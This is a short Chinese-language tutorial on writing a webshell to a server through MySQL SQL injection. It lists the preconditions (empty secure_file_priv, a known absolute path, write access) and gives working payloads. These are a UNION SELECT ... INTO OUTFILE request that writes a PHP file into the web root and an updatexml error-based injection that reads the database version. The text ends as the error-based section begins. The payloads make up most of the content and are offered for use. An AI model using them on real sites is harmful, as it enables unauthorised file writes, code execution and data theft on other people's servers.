文章目录
写shell条件
1、secure_file_priv为空
查询语法:SHOW VARIABLES LIKE “secure_file_priv”;
2、知道绝对目录
3、目录有写入权限
最常见的注入写shell方式
union select 后跟 into outfile 语句,这种方式仅支持存在联合注入的前提下面
注入语法:
?id=1 UNION SELECT '<?php phpinfo();?>',2,3 into OUTFILE 'F:/phpstudy_pro/WWW/test.php'
sql语法:
SELECT * from admin WHERE id = 1 UNION SELECT '<?php phpinfo();?>',2,3 into OUTFILE 'F:/phpstudy_pro/WWW/test.php'
报错注入写shell
报错的基本语法:updatexml(1,concat(0x7e,(select version()),0x7e),1)
这样可以查询到数据库版本